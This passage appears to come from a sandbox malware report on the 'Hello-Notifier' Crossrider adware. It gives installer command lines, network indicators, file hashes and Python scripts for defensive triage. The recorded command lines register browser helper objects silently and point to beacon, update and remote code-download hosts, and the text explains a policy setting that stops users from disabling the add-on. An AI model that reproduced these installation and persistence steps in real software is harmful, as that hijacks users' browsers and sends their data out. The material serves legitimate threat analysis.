"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\extensionData'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
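
Every Hello-Notifier component takes its configuration on the command line: an action switch (/installapp, /updateapp, /enablebho, /executebg, /installxpi), campaign identifiers (/appid, /srcid, /bic, /verifier), the reporting and download hosts, and for the enabler the BHO CLSID (/bhoguid), which is the same CLSID written under Policies\Ext\CLSID in the evasion signature above (the Internet Explorer Add-on List policy; a value of 1 marks the add-on as approved and stops the user from disabling it in Manage Add-ons). The parser below is an added example, not code from the report or from the Crossrider installer: it tokenises these lines while respecting the single-quoted values, pulls the hostnames out of the URL-valued switches, and keeps the identifiers worth pivoting on across samples. The two command lines embedded in it are copied verbatim from the Processes section; the token grammar (`/name`, `/name=value`, values optionally wrapped in single or double quotes) is inferred from those lines and is an assumption.

```python
import re
from urllib.parse import urlsplit

# Constructed input: two command lines copied verbatim from the Processes
# section above (codedownloader /installapp and enabler /enablebho).
SAMPLE_CMDLINES = [
    r"""
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\extensionData'
""",
    r"""
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
""",
]

# Assumed grammar, inferred from the lines above: a token is a run of
# non-space characters in which single- or double-quoted spans may contain spaces.
TOKEN_RE = re.compile(r"""(?:"[^"]*"|'[^']*'|[^\s"'])+""")
PIVOT_KEYS = ("appid", "srcid", "bic", "verifier", "bhoguid", "extensionid")


def parse_cmdline(cmdline):
    """Split one command line into (image path, {switch: value or True})."""
    tokens = TOKEN_RE.findall(cmdline.strip())
    exe = tokens[0].strip('"')
    args = {}
    for tok in tokens[1:]:
        if not tok.startswith("/"):
            continue  # stray token: skip it rather than fail the whole line
        name, sep, value = tok[1:].partition("=")
        args[name.lower()] = value.strip("'\"") if sep else True
    return exe, args


def extract_hosts(args):
    """Hostnames from every http(s) URL-valued switch (file:// is local)."""
    hosts = set()
    for value in args.values():
        if isinstance(value, str) and "://" in value:
            parts = urlsplit(value)
            if parts.scheme in ("http", "https") and parts.hostname:
                hosts.add(parts.hostname)
    return hosts


def triage(cmdlines):
    """One summary per process: action switch, remote hosts, pivot identifiers."""
    summaries = []
    for cmd in cmdlines:
        exe, args = parse_cmdline(cmd)
        summaries.append({
            "image": exe,
            "mode": next(iter(args), None),  # the first switch names the action
            "hosts": sorted(extract_hosts(args)),
            "pivots": {k: args[k] for k in PIVOT_KEYS if k in args},
            "local_paths": sorted(v for v in args.values()
                                  if isinstance(v, str) and ":\\" in v),
        })
    return summaries


if __name__ == "__main__":
    for s in triage(SAMPLE_CMDLINES):
        print(f"{s['image']}\n  mode={s['mode']} hosts={s['hosts']}\n  pivots={s['pivots']}")
```

The same parser handles the firefoxinstaller line, whose /updateurl points at an https CDN host that never appears in the Network table. Note that /bic and /verifier are per-installation tokens: they identify this install run to the stats endpoints, so they are useful for clustering reports but not as a family-level indicator.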

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 errors.srvstatsdata.com udp
SG 13.251.16.150:80 errors.srvstatsdata.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 update.srvstatsdata.com udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 stats.srvstatsdata.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 stats.mstatsserv.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 app-static.crossrider.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 stats.mstatsserv.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 210.108.222.173.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
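
The Network table mixes three kinds of rows: DNS queries to the sandbox resolver (port 53/udp), reverse lookups (*.in-addr.arpa) that carry no indicator attributable to the sample, and actual connections. Only the last kind gives a blockable (domain, IP, port) tuple, and the gap between the queried set and the connected set is informative in itself: app-static.crossrider.com and stats.mstatsserv.com were looked up but never connected to during this run. The script below is an added example, not part of the report. It embeds the table above row for row, separates lookups from connections, drops the PTR rows, drops traffic to the bing.com and bing.net suffixes on the assumption that it is the Windows guest's own background traffic rather than the sample's (that list is an assumption to tune per sandbox image), and returns the deduplicated connection set plus the DNS-only domains.

```python
# Constructed input: the Network table above, copied row for row.
SAMPLE_NETWORK = """\
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 errors.srvstatsdata.com udp
SG 13.251.16.150:80 errors.srvstatsdata.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 update.srvstatsdata.com udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
SG 13.251.16.150:80 update.srvstatsdata.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 stats.srvstatsdata.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 stats.mstatsserv.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 app-static.crossrider.com udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
SG 13.251.16.150:80 stats.srvstatsdata.com tcp
US 8.8.8.8:53 stats.mstatsserv.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 210.108.222.173.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
"""

# Assumption: these suffixes are the Windows guest's own background traffic
# (IE/Bing), not the sample's. Tune per sandbox image.
NOISE_SUFFIXES = (".bing.com", ".bing.net")
PTR_SUFFIX = ".in-addr.arpa"
DNS_PORT = 53


def parse_network(text):
    """Rows are `COUNTRY IP:PORT DOMAIN PROTO`, as in the table above."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # header or malformed row: skip rather than guess
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def is_noise(domain):
    return domain.endswith(PTR_SUFFIX) or any(
        domain == s[1:] or domain.endswith(s) for s in NOISE_SUFFIXES)


def triage_network(rows):
    queried, connections, dropped = set(), [], 0
    for r in rows:
        if is_noise(r["domain"]):
            dropped += 1
            continue
        if r["port"] == DNS_PORT and r["proto"] == "udp":
            queried.add(r["domain"])      # a lookup, not a connection
            continue
        key = (r["domain"], r["ip"], r["port"], r["proto"])
        if key not in connections:       # collapse repeated beacons
            connections.append(key)
    connected = {c[0] for c in connections}
    return {
        "connections": connections,
        "dns_only": sorted(queried - connected),
        "ips": sorted({c[1] for c in connections}),
        "dropped": dropped,
    }


if __name__ == "__main__":
    result = triage_network(parse_network(SAMPLE_NETWORK))
    for domain, ip, port, proto in result["connections"]:
        print(f"{domain} -> {ip}:{port}/{proto}")
    print("resolved but never contacted:", ", ".join(result["dns_only"]))
    print(f"{result['dropped']} rows dropped as PTR or guest background noise")
```

On this table the three stats/errors/update hostnames collapse onto a single IP and port, so a network block on 13.251.16.150:80 covers all of the observed beaconing, while the DNS-only names still belong on a watchlist: a domain that was resolved but not contacted in a sandbox run may simply have been gated on a condition the run did not meet.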

Files

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\System.dll

MD5 00a0194c20ee912257df53bfe258ee4a
SHA1 d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256 dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA512 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\WrapperUtils.dll

MD5 7a18f06f0935a9e98a14d47d77064573
SHA1 58b12858557fb39cf876b6e76e585cf581b53590
SHA256 422a61da2bedfdc8167cb022b4b5e0ff8588dc1e6bd40b3c4ba97588836f1b0f
SHA512 356fa81d066db57054d5477e96d12ca9a5e9639731c06d61dc320dc52bf6054f603523e2da3751a96a4608dc19c20868ed3573ccdf3d32bef025035770a434e6

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\StdUtils.dll

MD5 21010df9bc37daffcc0b5ae190381d85
SHA1 a8ba022aafc1233894db29e40e569dfc8b280eb9
SHA256 0ebd62de633fa108cf18139be6778fa560680f9f8a755e41c6ab544ab8db5c16
SHA512 95d3dbba6eac144260d5fcc7fcd5fb3afcb59ae62bd2eafc5a1d2190e9b44f8e125290d62fef82ad8799d0072997c57b2fa8a643aba554d0a82bbd3f8eb1403e

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe

MD5 a4c3e2148c1e6f2298ca76e998d32efb
SHA1 309b580cf1386e24eba522c79c4d7ce2d1fd84a9
SHA256 7f0141ce147904a3c0debd19f46cb1111ce6315459b34b34b5039ed670862cd4
SHA512 234578790ff105eb7dde8ce6b785fbbd413a11aec85d6231bd4307ba229844eddb6060c7b5cc7ac545f901a8651966b02f350cb26fcc08c1dc7e0309455e5fc1

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsislog.dll

MD5 e47100b70748fc790ffe6299cdf7ef2d
SHA1 ad2a9cd5f7c39121926b7c131816e7ba85aeead2
SHA256 271d539fe130276189e0a32b8a0bc9f08f2d92f7e17f85d88726735f14ea6144
SHA512 88452a9aeff453e7979df9240ab396cbc0c5d00efecda97df1e46f2ba1e9b5bfd990921e85d503beb4b35a1de7681390ba124eeeaf896f250717892ced133e93

memory/3788-36-0x0000000002430000-0x0000000002440000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils2.dll

MD5 8c17aa401cdc9bfe61b57f4d4bfec362
SHA1 8c580457b636bc30bedb476cebb9a50d9f02651d
SHA256 dfc863b01224a8d3bf35ef6064d6051aab295b9618db72647202f9ca97e45d19
SHA512 9fa29aab6cde651a0afb8cacf3dc2ee063b4351c7cf16c49668b2b59062914dbe53c93368e7b2a73a267c4d3eddd513fe7ac282422cf06397d2ad8839c3cd881

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsisos.dll

MD5 69806691d649ef1c8703fd9e29231d44
SHA1 e2193fcf5b4863605eec2a5eb17bf84c7ac00166
SHA256 ba79ab7f63f02ed5d5d46b82b11d97dac5b7ef7e9b9a4df926b43ceac18483b6
SHA512 5e5e0319e701d15134a01cb6472c624e271e99891058aef4dfe779c29c73899771a5b6f8b1cd61b543a3b3defeaecaa080c9cc4e76e84038ca08e12084f128eb

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log

MD5 ce14bd5475369423463ca07da9e13db4
SHA1 810fef89a7b7b04a0c5f34760f4116cc4f805717
SHA256 c3a1e1b4cb77a85df726d172284297e1d7e00a93395c966dbad6635cb529dbb9
SHA512 b4cfcb51485b0427ade131e1c5888cd56df2cef904750410e796b0c0ece74454ed82aee2401778a7618c1784d49cdc89dd5ee67d4cdf481a6430ecf6e94fa3f0

memory/3788-315-0x0000000002430000-0x0000000002439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\md5dll.dll

MD5 0745ff646f5af1f1cdd784c06f40fce9
SHA1 bf7eba06020d7154ce4e35f696bec6e6c966287f
SHA256 fbed2f1160469f42ce97c33ad558201b2b43e3020257f9b2259e3ce295317a70
SHA512 8d31627c719e788b5d0f5f34d4cb175989eaa35aa3335c98f2ba7902c8ae01b23de3ccb9c6eb95945f0b08ef74d456f9f22ca7539df303e1df3f6a7e67b358da

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils.dll

MD5 895bc798fb0d31e5d3e584ae5701925b
SHA1 d5184d234c1768d3fe671be1512bb58688b37698
SHA256 050bcec7226cfe81328bd44de1091355d368f1e9183d232eef1f598ffbd3bc99
SHA512 b0b0a108f8c21e4f9420245646c546293ea1138580d47dae35b2e467bb2752d7c2cc9df490fdac9e2596acc258dfaa13df8bbf98d45c9f7d77418ac7fdf5cf7b

memory/3788-356-0x0000000004120000-0x0000000004130000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\UserInfo.dll

MD5 7579ade7ae1747a31960a228ce02e666
SHA1 8ec8571a296737e819dcf86353a43fcf8ec63351
SHA256 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
SHA512 a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\inetc.dll

MD5 4c01fdfd2b57b32046b3b3635a4f4df8
SHA1 e0af8e418cbe2b2783b5de93279a3b5dcb73490e
SHA256 b98e21645910f82b328f30c644b86c112969b42697e797671647b09eb40ad014
SHA512 cbd354536e2a970d31ba69024208673b1dc56603ad604ff17c5840b4371958fc22bafd90040ae3fb19ae9c248b2cfce08d0bc73cc93481f02c73b86dbc0697b2

memory/3768-427-0x0000000000400000-0x0000000000499000-memory.dmp

memory/3788-428-0x0000000000400000-0x00000000005B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

MD5 064d2a2851c44f039fa89e24672ec065
SHA1 2b6a7e3b294a73c63d8d013541bd70617dfb026a
SHA256 f2d61b9b2d422007fc273a93c6718a7d7264e5245fde3d2716d40a63340fdd07
SHA512 93dcfc3ee338b98508f784470347789d4cb6a49fb4c2d0d3c28fc924477c577ff506da787ca6b71f79e3eeac85d63bf3ddc3dc6805d95cb22fbde4aceea5d397

memory/3788-516-0x0000000004F50000-0x0000000004F60000-memory.dmp

memory/3788-522-0x0000000004F60000-0x0000000004F70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log

MD5 5b1165ca2b57bcb379a4db800e60d821
SHA1 fe82f726c47198f95e05c0a4634991e0246b39f4
SHA256 2e874618fe401daca2f82e902bb77760a202eb8394ab70cbdc3fd294fe297ecb
SHA512 8d6080dc0b9a08150a9df1f942f313f6d6f788946a6fb82710bb286dd598ee842f733c25ee939f239213a3213872e1db495958c516cfe18b8ba9df584748e53d

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3yrocb08.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\ExecDos.dll

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp

Analysis: behavioral3

Detonation Overview

Submitted 2024-10-25 22:18
Reported 2024-10-25 22:20
Platform win7-20240903-en
Max time kernel 118s
Max time network 123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted 2024-10-25 22:18
Reported 2024-10-25 22:20
Platform win10v2004-20241007-en
Max time kernel 99s
Max time network 102s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3516 wrote to memory of 3552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3516 wrote to memory of 3552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3516 wrote to memory of 3552 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3552 -ip 3552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 101.11.19.2.in-addr.arpa udp
US 8.8.8.8:53 226.108.222.173.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted 2024-10-25 22:18
Reported 2024-10-25 22:20
Platform win7-20240903-en
Max time kernel 118s
Max time network 121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 220

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted 2024-10-25 22:18
Reported 2024-10-25 22:21
Platform win10v2004-20241007-en
Max time kernel 109s
Max time network 117s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4832 wrote to memory of 4836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4832 wrote to memory of 4836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4832 wrote to memory of 4836 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4836 -ip 4836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 110.11.19.2.in-addr.arpa udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

N/A